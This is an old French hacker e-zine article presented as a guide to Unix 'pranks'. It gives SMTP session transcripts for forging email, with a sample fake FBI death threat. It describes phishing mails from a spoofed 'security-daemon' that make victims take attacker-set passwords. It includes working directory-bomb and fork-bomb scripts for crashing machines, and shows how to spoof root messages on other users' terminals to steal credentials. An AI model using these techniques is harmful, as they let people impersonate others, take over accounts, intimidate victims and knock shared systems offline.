o/~ Paranoia ! o/~ Paranoia o/~ ---===***###> Plaisanter sous Unix <###***===--- o/~ They are Back ! o/~ Vous vous etes toujours demandé comment jouer des farces sous Unix, comment foutres les boules a vos potes, a votre administrateur, jouer au con avec le psyche des autres, faire du SEAO? Eh bien voila le but de cet autre petit ++N-Phile. Amusez vous bien ! [ nota : tout ce qui est tapé au clavier est précédé de ">>>" ] > Mailer sous un autre nom: ======================== Pour cela, il faut connaitre les bases du transfer de mail. Le mail sous Unix est transporte de machine en machine par "sendmail" qui écoute les messages des autres mailers ou de ses clients sur le port TCP numéro 25. DaubeNet {101} grep smtp /etc/services smtp 25/tcp mail Donc il suffit de se connecter la bas et de respecter le protocole SMTP (Simple Message Transfer Protocol) plus une petite astuce pour faire un faux mail qui pourrait venir de n'importe ou. ---------------------- DaubeNet {102} >>> telnet localhost 25 Trying 127.0.0.1... Connected to univ-anon.fr. Escape character is '^]'. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600 220 ESMTP spoken here >>>help 214-Commands: 214- HELO EHLO MAIL RCPT DATA 214- RSET NOOP QUIT HELP VRFY 214- EXPN VERB 214-For more info use "HELP ". 214-To report bugs in the implementation send email to 214- sendmail@CS.Berkeley.EDU. 214-For local information send email to Postmaster at your site. 214 End of HELP info >>>help helo 214-HELO 214- Introduce yourself. 214 End of HELP info >>>help mail 214-MAIL FROM: 214- Specifies the sender. 214 End of HELP info >>>help rcpt 214-RCPT TO: 214- Specifies the recipient. Can be used any number of times. 214 End of HELP info >>>help data 214-DATA 214- Following text is collected as the message. 214- End with a single dot. 214 End of HELP info >>>help quit 214-QUIT 214- Exit sendmail (SMTP). 214 End of HELP info >>>quit 221 DaubeNet closing connection Connection closed by foreign host. ---------------------- Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger un mail. C'est très facile mais il y a une bidouille qu'il faut connaitre et qui vous trahi si vous ne la connaissez pas. ---------------------- DaubeNet {103} >>> telnet localhost 25 Trying 127.0.0.1... Connected to univ-anon.fr. Escape character is '^]'. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600 220 ESMTP spoken here >>>helo ducon.fbi.com 250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you >>>mail from: root@ducon.fbi.com 250 root@ducon.fbi.com... Sender ok >>>rcpt to: fred 250 fred... Recipient ok >>>data 354 Enter mail, end with "." on a line by itself >>> >>>Please, would you stop playing with my Unix system otherwise i'll >>>send a wet operation commando to your university. >>> >>>Nigel X. >>>System Administrator at FBI Inc. >>>root@fbi.com >>>. 250 DAA00299 Message accepted for delivery >>>quit 221 DaubeNet closing connection Connection closed by foreign host. ---------------------- Haha, ca y est, on a envoyé notre petite bidouille et le mec va avoir les jetons de sa vie: ---------------------- DaubeNet {104} >>> mail Mail version 5.5 6/1/90. Type ? for help. "/var/mail/fred": 1 message 1 new >N 1 root@ducon.fbi.com Thu Sep 15 03:55 14/508 & >>>1 Message 1: From root@ducon.fbi.com Thu Sep 15 03:55:03 1994 From: root@ducon.fbi.com Apparently-To: fred [ * ] Please, would you stop playing with my Unix system otherwise i'll send a wet operation commando to your university. Nigel X. System Administrator at FBI Inc. root@fbi.com & >>>d & >>>q ---------------------- Arghh... Vous avez vu comme moi la ligne ou j'ai mis une astérisque entre crochets : C'est marqué: "Apparently-To: " arghhh... Ca fait vraiment pas serieux n'est ce pas? C'est ce qui vous trahi quand vous ne connaissez pas la bidouille. Et en parlant de bidouille, la voici... ---------------------- DaubeNet {105} >>> telnet localhost 25 Trying 127.0.0.1... Connected to univ-anon.fr. Escape character is '^]'. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600 220 ESMTP spoken here >>>helo 250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you >>>mail from: root@fbi.com 250 root@fbi.com... Sender ok >>>rcpt to: fred 250 fred... Recipient ok >>>data 354 Enter mail, end with "." on a line by itself >>>To: fred@univ-anon.fr [ * ] >>> >>>Good afternoon, >>> >>> Could you please stop playing with my unix system otherwise i'll >>>be forced to send one of our wet operations' commando to execute you. >>> >>>Nigel X, System Administrator at Fbi Inc. >>>. 250 DAA00307 Message accepted for delivery >>>quit 221 DaubeNet closing connection Connection closed by foreign host. ---------------------- Vous regarderez attentivement la premiere ligne tapée après le DATA. C'est un "To: " suivi de l'adresse a qui on envoie... Et voila le résultat: ---------------------- DaubeNet {106} >>> mail Mail version 5.5 6/1/90. Type ? for help. "/var/mail/fred": 1 message 1 new >N 1 root@fbi.com Thu Sep 15 03:57 14/509 & >>>1 Message 1: From root@fbi.com Thu Sep 15 03:57:41 1994 From: root@fbi.com To: fred@univ-anon.fr Good afternoon, Could you please stop playing with my unix system otherwise i'll be forced to send one of our wet operations' commando to execute you. Nigel X, System Administrator at Fbi Inc. & >>>d & >>>q DaubeNet {107} exit ---------------------- C'est beau non la technique... ;) Grace à cela vous pouvez commencer à lancer la terreur sur votre réseau. Hacking Psychology: ================== Les utilisateurs sont par définition très soumis (et c'est pour cela que l'on distingue les hackers, ils refusent cette soumission.) Pour un user lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe qui peut faire du faux mail... Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont completement flooder toute la boite aux lettre de votre/vos victime(s). Mais il y a plus interressant. Imaginez que quelqu'un recoive un message de: security-daemon@ disant: ----- * This is and automated mailing : don't reply * We have found that your password is insecure. You should change this otherwise your account will be disabled. Please use the password "ItG-4v3" instead. Thank you. Security Daemon. ----- Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de comptes. Une fois, j'ai réussi même à faire changer le mot de passe de *l'admin* !!!!! Quel con, il obéit à des packages de sécurité qu'il n'a même pas installé. AHahaha ! Foutre un systeme sur les genoux: ================================ Pour cela il y a des petits trucs tout con à faire si vous n'avez pas d'accounting: créez un petit script "toto" de ce type: #!/bin/sh mkdir ./-fuck cp ./toto ./-fuck/toto cd ./-fuck ./toto Hehe, le truc va faire de plus en plus de directory et la machine s'arretera par manque d'inode. On peut aussi faire dans le meme genre un fichier "foo": #!/bin/csh ./foo & ./foo & ./foo & hehe, effet tout aussi garanti... On peut même mixer les deux ! Les messages fantomes: ===================== Vous savez, quand vous faites un write la personne à qui il est déstiné recoit: Message from at/... Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes non?? Eh bien c'est possible: Il faut savoir comment ca marche. Chaque utilisateur loggé a au moins un terminal. Ce terminal est représenté dans le système Unix comme un nom de périphérique du type: /dev/ttyXX ou XX est généralement un nombre ou une lettre et un nombre. Bref, c'est la dessus qu'écrit la commande write. Le "msg on" ou "msg off" que l'on tape modifie simplement la protection en écriture sur ce périphérique. Sur les anciens système, l'appel système vhangup() n'éxistait pas et on pouvait donc se connecter, regarder les terminaux disponibles (nons attribués à des users donc en lecture et ecriture pour tout le monde) et faire un cat dessus comme ceci: $ cat >/dev/tty02 ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge par ce terminal. Ensuite, préparer a coté le : Message from root at... Veuillez changer immédiatement votre mot de passe en: "TuY5;tK" Merci. Votre administrateur système. Fun isn't it? S'amuser avec les émulateurs de terminaux: ========================================= Vous savez que par exemple zmodem envoie une chaine de caractère qui lance automatiquement Zmodem en reception du cote de l'émulateur de terminaux. C'est très interressant car on peut faire appeler intempestivement Zmodem dans l'émulateur si telle ou telle personne en message on utilise un émulateur de terminaux. Il suffit d'enregistrer la séquence envoyée par Zmodem pour déclancher l'appel de Zmodem et hop, bienvenue en enfer ! Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c et son ancetre qui ne le fait pas mais est sympa: flash.c.